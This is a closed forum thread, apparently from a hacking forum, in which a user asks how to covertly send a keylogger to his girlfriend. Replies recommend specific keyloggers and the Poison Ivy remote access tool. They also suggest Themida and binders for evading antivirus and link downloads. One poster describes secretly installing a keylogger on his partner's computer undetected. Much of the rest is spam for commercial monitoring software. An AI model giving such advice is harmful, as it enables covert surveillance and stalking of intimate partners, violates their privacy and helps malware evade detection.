cacti
Closed Thread

Thread: Keylogger

Unhappy Keylogger

Yes i am curious about my gf's internet use and i read some threads and saw that spytector is a good remotekeylogger now all i need to know is what can i use to make it where my gf wont know that im sending her a keylogger and how i would go about accomplishing this task?

i have a keylogger you can use that i made but its not free. Has reverse connection and its a live time keylogger For more info email me [email]bosh*2*@msn.com[/email] and heres a video of that keylogger [url]www.deadly-hackers.com/Keylogger.zip[/url]

^ Does that work? Has anyone tried it?
    Hi

Tiscali is the worst ISP ever.

I would recommend using the Poison Ivy Remote Administration Tool (RAT).
    Any keylogger you use must be undetected though, to bypass anti-virus detection.

Question

^ How can it go through undetected?
    Hi

Tiscali is the worst ISP ever.

With a program called Themida.

Question keylogger screen play

Quote Originally Posted by Evilthoutz View Post
    i have a keylogger you can use that i made but its not free. Has reverse connection and its a live time keylogger For more info email me [email]bosh*2*@msn.com[/email] and heres a video of that keylogger [url]www.deadly-hackers.com/Keylogger.zip[/url]
    are you trying to make us fool or ?? i have downloaded that video file.
    to chek your created keylogger how it works . it is in avi format all i get the messege codecs is not supported with windows mediaplayer** -divix - real player-

Quote Originally Posted by sweet-virus View Post
    are you trying to make us fool or ?? i have downloaded that video file.
    to chek your created keylogger how it works . it is in avi format all i get the messege codecs is not supported with windows mediaplayer** -divix - real player-
    Try VLC. You'll find it's a lot less bloated than WMP and supports many codecs without extra tweaking.

Quote Originally Posted by AnArChY_OnLiNe View Post
    Yes i am curious about my gf's internet use and i read some threads and saw that spytector is a good remotekeylogger now all i need to know is what can i use to make it where my gf wont know that im sending her a keylogger and how i would go about accomplishing this task?
    If you look thru the forum,there are plenty posts about that matter. I posted some binders and there are some discussions about keylogger somwhere in forum.

trendy and themida are 2 of my favorites.
    jabber: gh05t*d@jabb*r.org Email: gh05t*d@hack.cl

Internet security is as real as your Dreams !

Thumbs up Pretty Good Keylogger

I just bought a keylogger called "KeyProwler" which is a very good and inexpensive Keylogger engine and much more. it not only does keylogging, but takes screenshots and emails you logs even when you do not have access to the program! check it out...I like KeyProwler because it is very simple to use and not overly complicated like the other keylogging software. About a month ago i downloaded one of those free keyloggers and it contained viruses.
    Try to use commercials keyloggers that gives you a free trial time.

Do they have to install another program for them to install the keylogger? Or can you send anything

Talking The Best keylogger

i had exactly the same problem that u had, the gf thing..
    downloaded and tried lots of them, finally i got the one i wanted.
    [url]http://thebestkeylogger.mine.nu/[/url]
    It did everything i wanted, and even more, Avast Antivirus did not find it and didnt complain, she never saw it coming...
    Installed it, found out she was messing our with a friend of ours, so i confronted her. And without the keylogger help i couildnt really prove anything, and thats my story folks .

so , */*0 to [url]http://thebestkeylogger.mine.nu/[/url]

ps: * is because it have a little bit to much that i didnt use :P

Have fun!

remote keylogger?

No recommendation for [URL="http://www.monitoring-softwares.com/keylogger-monitoring-software.html"]remote keylogger monitoring software[/URL] cos they are easily found out by the receiver, so you'd better install by yourself to ensure that it will be successful. [URL="http://www.monitoring-softwares.com/parental-monitoring-software.html"]Power keylogger[/URL] is a smart and simple one i know of from eamsoft.
    Last edited by wodenwilkes; 09-12-2009 at 10:32 PM.

I'm sorry for answering in this old thread, but as far as I can see, people are still interested in the subject
    I use keyloggers (Actymac Dutywatch, Protemac Keybag) to monitor my daughter's internet activity - those mentioned aren't remote, but they have many useful features.

I also use [URL="http://www.keylogger-for-mac.com/"]Mac keylogger[/URL] to record all PC activities ,it can stealthly and undetectably monitor and do not need admin password and .......in a word ,it is easy to use ,you can try
    Last edited by vivean; 10-09-2009 at 10:42 PM.

Closed Thread